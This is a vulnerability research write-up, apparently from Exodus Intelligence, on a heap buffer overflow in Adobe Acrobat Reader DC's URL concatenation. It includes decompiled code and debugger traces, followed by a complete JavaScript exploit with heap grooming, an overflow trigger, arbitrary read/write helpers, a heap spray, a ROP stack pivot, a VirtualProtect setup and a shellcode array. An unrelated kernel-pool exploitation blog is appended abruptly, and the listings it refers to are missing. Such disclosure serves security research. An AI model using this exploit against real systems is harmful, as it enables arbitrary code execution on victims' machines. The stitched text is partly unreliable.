The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for myself - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism for myself to not only share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver and the win10-klfh branch (HEVD) to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low integrity processes and AppContainer protected processes, such as a browser sandbox, prevent Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address for ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now not only being very scarce and far-and-few between, information leaks, such as an out-of-bounds read, are the de-facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows, which is already heavily documented much better than any attempt I can make, the implications of the kFLH, from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel mode drivers can allocate dynamic memory from, such as malloc from user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead ofExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One word about the “new” APIs is that they will initialize allocate pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.

The first parameter of this function is POOL_TYPE, which is of type enumeration, that specifies the type of memory to allocate. These values can be seen below.

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from or they can create their own private heaps as well. The Windows pool works a little different, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory. Allocations in the non-paged pool will always be paged in memory. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10 byte _POOL_HEADER structure on 64-bit system, which can be found using WinDbg.

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a _POOL_HEADER structure is freed and it isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union member, as it is clean two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

